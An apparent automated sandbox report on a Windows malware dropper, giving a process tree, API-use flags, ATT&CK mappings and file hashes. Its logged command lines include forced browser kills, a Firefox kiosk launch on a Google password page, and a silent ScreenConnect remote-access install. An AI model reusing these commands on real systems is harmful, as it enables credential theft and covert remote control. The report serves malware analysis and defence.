Token: SeSecurityPrivilege | 4068 | msiexec.exe
Token (one entry each, in order): SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege | 3448 | msiexec.exe
Token (one entry each, in order): SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege | 3448 | msiexec.exe
Suspicious use of FindShellTrayWindow 40 IoCs
pid   Process                            entries
4180  1K20A9.exe                         1
5000  4T753l.exe                         8
3448  msiexec.exe                        1
5000  4T753l.exe                         1
1524  firefox.exe                        21
5000  4T753l.exe                         2
3448  msiexec.exe                        1
5624  ScreenConnect.WindowsClient.exe    5
Suspicious use of SendNotifyMessage 36 IoCs
pid   Process                            entries
5000  4T753l.exe                         9
1524  firefox.exe                        20
5000  4T753l.exe                         2
5624  ScreenConnect.WindowsClient.exe    5
Suspicious use of SetWindowsHookEx 1 IoCs
pid   Process                            entries
1524  firefox.exe                        1
Suspicious use of WriteProcessMemory 64 IoCs
description                        pid   Process                                                                  procid_target  entries
PID 4040 wrote to memory of 1364   4040  d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe    86             3
PID 1364 wrote to memory of 3512   1364  k3a89.exe                                                                89             3
PID 3512 wrote to memory of 4180   3512  l3v78.exe                                                                90             3
PID 4180 wrote to memory of 2616   4180  1K20A9.exe                                                               91             3
PID 3512 wrote to memory of 2228   3512  l3v78.exe                                                                92             3
PID 1364 wrote to memory of 1280   1364  k3a89.exe                                                                103            3
PID 4040 wrote to memory of 5000   4040  d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe    104            3
PID 5000 wrote to memory of 4068   5000  4T753l.exe                                                               105            3
PID 5000 wrote to memory of 1476   5000  4T753l.exe                                                               109            3
PID 5000 wrote to memory of 4536   5000  4T753l.exe                                                               111            3
PID 5000 wrote to memory of 4856   5000  4T753l.exe                                                               113            3
PID 5000 wrote to memory of 776    5000  4T753l.exe                                                               115            3
PID 5000 wrote to memory of 512    5000  4T753l.exe                                                               120            2
PID 512 wrote to memory of 1524    512   firefox.exe                                                              121            11
PID 2616 wrote to memory of 1916   2616  skotes.exe                                                               122            3
PID 1524 wrote to memory of 2004   1524  firefox.exe                                                              123            12
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
C:\Users\Admin\AppData\Local\Temp\d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe"
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4040
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\k3a89.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\k3a89.exe
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1364
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\l3v78.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\l3v78.exe
      - Executes dropped EXE
      - Adds Run key to start application
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID:3512
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1K20A9.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1K20A9.exe
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Checks computer location settings
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Drops file in Windows directory
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory
        PID:4180
        C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
          - Identifies VirtualBox via ACPI registry values (likely anti-VM)
          - Checks BIOS information in registry
          - Checks computer location settings
          - Executes dropped EXE
          - Identifies Wine through registry keys
          - Adds Run key to start application
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory
          PID:2616
          C:\Users\Admin\AppData\Local\Temp\1004454001\zhark.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\1004454001\zhark.exe"
            - Checks computer location settings
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            - Suspicious use of AdjustPrivilegeToken
            PID:1916
            C:\Windows\SysWOW64\msiexec.exe
              Command line: "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\d24c72d59e97003e\ScreenConnect.ClientSetup.msi"
              - Enumerates connected drives
              - System Location Discovery: System Language Discovery
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of FindShellTrayWindow
              PID:3448
          C:\Users\Admin\AppData\Local\Temp\1004459001\155aa5ef5f.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\1004459001\155aa5ef5f.exe"
            - Identifies VirtualBox via ACPI registry values (likely anti-VM)
            - Checks BIOS information in registry
            - Executes dropped EXE
            - Identifies Wine through registry keys
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            PID:6068
            C:\Windows\SysWOW64\WerFault.exe
              Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 6068 -s 1580
              - Program crash
              PID:6516
          C:\Users\Admin\AppData\Local\Temp\1004460001\1efbfbe0a1.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\1004460001\1efbfbe0a1.exe"
            - Identifies VirtualBox via ACPI registry values (likely anti-VM)
            - Checks BIOS information in registry
            - Executes dropped EXE
            - Identifies Wine through registry keys
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            PID:6652
          C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            PID:4872
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2z8437.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2z8437.exe
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        PID:2228
        C:\Windows\SysWOW64\WerFault.exe
          Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 1596
          - Program crash
          PID:3000
        C:\Windows\SysWOW64\WerFault.exe
          Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 1560
          - Program crash
          PID:824
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3s79Z.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3s79Z.exe
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      PID:1280
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4T753l.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4T753l.exe
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:5000
    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /F /IM firefox.exe /T
      - System Location Discovery: System Language Discovery
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID:4068
    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /F /IM chrome.exe /T
      - System Location Discovery: System Language Discovery
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID:1476
    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /F /IM msedge.exe /T
      - System Location Discovery: System Language Discovery
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID:4536
    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /F /IM opera.exe /T
      - System Location Discovery: System Language Discovery
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID:4856
    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /F /IM brave.exe /T
      - System Location Discovery: System Language Discovery
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID:776
    C:\Program Files\Mozilla Firefox\firefox.exe
      Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      - Suspicious use of WriteProcessMemory
      PID:512
      C:\Program Files\Mozilla Firefox\firefox.exe
        Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        - Checks processor information in registry
        - Modifies registry class
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
        PID:1524
        C:\Program Files\Mozilla Firefox\firefox.exe
          Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2012 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 1920 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0b77de24-d33a-40c2-82ec-917f74c4324b} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" gpu
          PID:2004
        C:\Program Files\Mozilla Firefox\firefox.exe
          Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2488 -parentBuildID 20240401114208 -prefsHandle 2464 -prefMapHandle 2460 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {be0f1a05-b263-450d-8841-67ceef0269e4} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" socket
          PID:4904
        C:\Program Files\Mozilla Firefox\firefox.exe
          Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2964 -childID 1 -isForBrowser -prefsHandle 3260 -prefMapHandle 3120 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb641dc6-a8ec-4210-ba20-2e48fa232a83} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
          PID:2524
        C:\Program Files\Mozilla Firefox\firefox.exe
          Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4032 -childID 2 -isForBrowser -prefsHandle 3992 -prefMapHandle 4024 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a44a9c27-ebca-4945-9e46-4bbe5895bd33} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
          PID:3768
        C:\Program Files\Mozilla Firefox\firefox.exe
          Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4664 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4648 -prefMapHandle 4644 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b71c063d-503d-4d6f-9dc5-b8f94127b5ff} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" utility
          - Checks processor information in registry
          PID:4324
        C:\Program Files\Mozilla Firefox\firefox.exe
          Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 3 -isForBrowser -prefsHandle 5364 -prefMapHandle 5356 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82748f5c-d07b-4945-8a2b-bc94a7c56175} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
          PID:5544
        C:\Program Files\Mozilla Firefox\firefox.exe
          Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5512 -childID 4 -isForBrowser -prefsHandle 5588 -prefMapHandle 5584 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {45596daf-3f2c-48c8-acd8-6ea8f58bd382} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
          PID:5556
        C:\Program Files\Mozilla Firefox\firefox.exe
          Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5380 -childID 5 -isForBrowser -prefsHandle 5780 -prefMapHandle 5776 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd6d0937-0f0b-42ef-93bc-df27b18c8233} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
          PID:5600
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2228 -ip 2228
  PID:3868
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2228 -ip 2228
  PID:3624
C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Boot or Logon Autostart Execution: Authentication Package
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4068
  C:\Windows\syswow64\MsiExec.exe
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 501C38EF6B291425D6859961753099A0 C
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:4592
    C:\Windows\SysWOW64\rundll32.exe
      Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI3246.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240661921 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery
      PID:7152
  C:\Windows\system32\srtasks.exe
    Command line: C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
    PID:624
  C:\Windows\syswow64\MsiExec.exe
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 7CFBEE859CA79996410C342D7BC32AF0
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1664
  C:\Windows\syswow64\MsiExec.exe
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 414DA11BFEF912AFF013CA3881CCDF84 E Global\MSI0000
    - Loads dropped DLL
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:5232
C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Checks SCSI registry key(s)
  PID:5856
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 6068 -ip 6068
  PID:6484
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6068 -ip 6068
  PID:3304
C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.ClientService.exe
  Command line: "C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-jo8t3z-relay.screenconnect.com&p=443&s=a79bfa06-e94f-44e4-9b80-51e71f3cd8f7&k=BgIAAACkAABSU0ExAAgAAAEAAQBlgoG8SEwJuyUMAVbS1u9ET8b79k7P%2f7J4ow1fhC2ZualDFO3ArdOiWpDAdhopcBg1REuXbjohRxTcgfk%2fkWJ0WT0qz5dal4OA949TlU4xXVZgsV0RQ27tunoj2Q3J7A0ZtL3jq76NFZjZmVG7GZ8TBeTo5Y06XH33FmoVf9VwzHvTmfCw68ESdxodX61R68SwDT%2feGQQsd4M4MsJXToPLVYZqtW1TRq5D4ltSurcvRmEJarN0C6Zv%2fcAzkHuYmbZkQ9ewAJ6tbcDfe8cR98K4%2f5CyE7xxC2Ljkso4d5K3C2QDFOLofUwV0kLgDGg60cdSrGBhJhxOkipcAOnC%2fXDH&c=zhark&c=&c=&c=&c=&c=&c=&c="
  - Sets service image path in registry
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:552
  C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsClient.exe
    Command line: "C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsClient.exe" "RunRole" "f83338c0-7281-4d35-abce-1ff54289d06a" "User"
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:5624
  C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsClient.exe
    Command line: "C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsClient.exe" "RunRole" "b774de6c-ea05-480c-b37d-f7e18ad61075" "System"
    - Executes dropped EXE
    - Drops file in System32 directory
    - Checks processor information in registry
    - Modifies data under HKEY_USERS
    PID:6168
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:2708
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:6528
Network
MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution (3)
    Authentication Package (1)
    Registry Run Keys / Startup Folder (2)
  Event Triggered Execution (1)
    Component Object Model Hijacking (1)
Privilege Escalation
  Boot or Logon Autostart Execution (3)
    Authentication Package (1)
    Registry Run Keys / Startup Folder (2)
  Event Triggered Execution (1)
    Component Object Model Hijacking (1)
Downloads
Filesize: 214KB
MD5: 6f52a4e795288f86d4cfdd10d0aece50
SHA1: 404b411fdab05b8fae792a765c24626e28ef1803
SHA256: c5dbc66a0300d6972e59c4093d4e97ae3eba82f32b426e1ced725da77cc7f581
SHA512: 95e1662e7d0e35d8b4418d077a607ad69aba056fc63ae81db2dc70a25aed636cb5f3605a3bd79cae70d2e25939e345db024cac31591e153b2b8b1e8dc1fc507b

Filesize: 45KB
MD5: 1503a8721469dcd677e64de935c7c320
SHA1: c618d6a9a4c01d8b88b323b4ca776838258de88d
SHA256: 9194a594d9d79773e10d5ee9a2d685914d7e02935b3c676b40a1fa97135a67d7
SHA512: 68e22b682c0b507107c9709b93bded22440f01f5820c0a50c85885c2cd56298c37ccda83f78a43ff3098926349b7ef479c5087a628b3579985ef4e759dd26109

Filesize: 48KB
MD5: d524e8e6fd04b097f0401b2b668db303
SHA1: 9486f89ce4968e03f6dcd082aa2e4c05aef46fcc
SHA256: 07d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4
SHA512: e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5

Filesize: 26KB
MD5: 5cd580b22da0c33ec6730b10a6c74932
SHA1: 0b6bded7936178d80841b289769c6ff0c8eead2d
SHA256: de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c
SHA512: c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

Filesize: 192KB
MD5: 3724f06f3422f4e42b41e23acb39b152
SHA1: 1220987627782d3c3397d4abf01ac3777999e01c
SHA256: ea0a545f40ff491d02172228c1a39ae68344c4340a6094486a47be746952e64f
SHA512: 509d9a32179a700ad76471b4cd094b8eb6d5d4ae7ad15b20fd76c482ed6d68f44693fc36bcb3999da9346ae9e43375cd8fe02b61edeabe4e78c4e2e44bf71d42

Filesize: 66KB
MD5: 5db908c12d6e768081bced0e165e36f8
SHA1: f2d3160f15cfd0989091249a61132a369e44dea4
SHA256: fd5818dcdf5fc76316b8f7f96630ec66bb1cb5b5a8127cf300e5842f2c74ffca
SHA512: 8400486cadb7c07c08338d8876bc14083b6f7de8a8237f4fe866f4659139acc0b587eb89289d281106e5baf70187b3b5e86502a2e340113258f03994d959328d
Filesize: 93KB
MD5: 75b21d04c69128a7230a0998086b61aa
SHA1: 244bd68a722cfe41d1f515f5e40c3742be2b3d1d
SHA256: f1b5c000794f046259121c63ed37f9eff0cfe1258588eca6fd85e16d3922767e
SHA512: 8d51b2cd5f21c211eb8fea4b69dc9f91dffa7bb004d9780c701de35eac616e02ca30ef3882d73412f7eab1211c5aa908338f3fa10fdf05b110f62b8ecd9d24c2

C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsAuthenticationPackage.dll
Filesize: 254KB
MD5: 5adcb5ae1a1690be69fd22bdf3c2db60
SHA1: 09a802b06a4387b0f13bf2cda84f53ca5bdc3785
SHA256: a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5
SHA512: 812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73

Filesize: 588KB
MD5: 1778204a8c3bc2b8e5e4194edbaf7135
SHA1: 0203b65e92d2d1200dd695fe4c334955befbddd3
SHA256: 600cf10e27311e60d32722654ef184c031a77b5ae1f8abae8891732710afee31
SHA512: a902080ff8ee0d9aeffa0b86e7980457a4e3705789529c82679766580df0dc17535d858fbe50731e00549932f6d49011868dee4181c6716c36379ad194b0ed69

C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsClient.exe.config
Filesize: 266B
MD5: 728175e20ffbceb46760bb5e1112f38b
SHA1: 2421add1f3c9c5ed9c80b339881d08ab10b340e3
SHA256: 87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077
SHA512: fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsCredentialProvider.dll
Filesize: 822KB
MD5: be74ab7a848a2450a06de33d3026f59e
SHA1: 21568dcb44df019f9faf049d6676a829323c601e
SHA256: 7a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d
SHA512: 2643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc

Filesize: 956B
MD5: 0cefe6f3e57d990f14a9ab39948c7537
SHA1: 7653e4ea304d876363c75a4be64159bfd478df48
SHA256: 0a08f8a37031033c611d66c860630e168c254fe34a3478cabc8a0a73136e010d
SHA512: c6f2e9fd2de23c7573b62315130d3f3bfee172a65915bc8f175c06f9697fa216accc5db3924eb3b6288a993a723c2f00fcea97a237d12fc2b1151a2867a152a4
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g9per00b.default-release\activity-stream.discovery_stream.json
Filesize: 19KB
MD5: 3151802e834cd134b9feda77ff089152
SHA1: be47e316f831c18e6748848a69a009bf3b189af1
SHA256: 7770fe9b84b360b272df55d1ea5b70c8fbcdd7ceb7f9604849f683bfaa930485
SHA512: 024413a0036d064464c825b14acc2e282336e480059867a11e859c5452814fdb50efec79f907fc62d127361cdf705722a65c6aa435695a0b3bacbefe0dba32c7

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g9per00b.default-release\cache2\entries\D500AD994A7515157BB2A6ADD5B18B754E4D2F99
Filesize: 13KB
MD5: f53f83a08302d1704bbf413cdb0bdfda
SHA1: 6fd3337a35819dd29e97b15837c9f0229cf7b072
SHA256: 176c1da7d1504a4f58e914caf183551f50cdf7180876bb0949ea48b26fb13851
SHA512: 12ec0348b9c2d71ebf9808783f27bca1a0b4234b31a7c6e89e421d37e197ef729cf4cea629fa46530fdb88e6671372f8f55e4985aa74e1665e61fa6798048f3b

Filesize: 5.4MB
MD5: df88b916e638a22e49eeef86a90a0a6f
SHA1: 6fca6e20fefd301d869e3f43162eb461ad007e36
SHA256: 120c4ebc2cc5028cbd1d9a65f4fbd88c0e7f809d5d3bb9304a0ef07585cc3a27
SHA512: 7d89f258785fc82d419aae70b8c6e30c5b14660fe2ba5f784eef6e870c4b9ba7a363b262b567f4ec169e9eb6feb3c34c3788a7621b3d6e2ebdd9208327a8a5b2

Filesize: 3.1MB
MD5: 4d318c83d2a583635245ef394da0fc01
SHA1: 7def013260fa81fa7543c6a9bfe8e4292c70c654
SHA256: 9eaaf032ee84ab135ec907c0261d7e4d37494ca00fc0f9b7b04546748de5f3ee
SHA512: b32b6054ca47a0219f5a57560866471580b2ddc40c42a363c45a49f872b1cfd87765f1c42185268b01b12305986274fd2ea86df217cb3f76ad486a92bb08040e

Filesize: 2.0MB
MD5: 2fde3af8c4c3f8d48b84383c63dab715
SHA1: f4463eb91c104176825e01a0f345e6ec732e8119
SHA256: 0f080dc2456a574a26e769774b11917771e160adaf7c47e07c314e9fcd83cb5a
SHA512: 6ab59be279b47f0c4a9496057b488bb2f85776f79d1e50925a75584adc37d75f6d359b487e0957049e6a5537c6873ec7feec43a828c31af67e56982239b87168

Filesize: 898KB
MD5: 64bcdca9bb96af42efbc33cc9f1c3cd2
SHA1: d9b548d19ac9dedd6c7327f9137836a3d2654535
SHA256: 6b608be957d976818d816d94893cdb615ac62c465ff264129a2b30d4b3655a3f
SHA512: ccbe4c762c6909d2b6a7bf6a99015a0472cfb7cd0f11a8e9ae72f05f3af5e135351f9354d80c4fcc9d6b7eb967fd75840378e2e4115864871ae0f5c880c8d52c
Filesize: 5.5MB
MD5: cc72144ca9b8d0bb78c0123fd358c4fc
SHA1: c2c2d2e1751e97b9090726fe4b5c3e15b46770fc
SHA256: e941bc8b2ce07c299cd77c80527f7d0dfd99eba2c6747a5b34c7f918479c3cf4
SHA512: fb5745c649049704c84420b6f6a59ef5339e50643147cb211835ca26bd90bc1ede243ed6bc4529c3a5180d017533d2579e66dcb5409e81d97a151548eaa62565

Filesize: 2.0MB
MD5: c17ed24e02488677c15a7f9af66a0aba
SHA1: 222cf4373cb4d9f05dccd3e2745a4b19cb4dd29f
SHA256: 61503aab6e8bb537631115556cf898894274211cae16c143081c2912532a018e
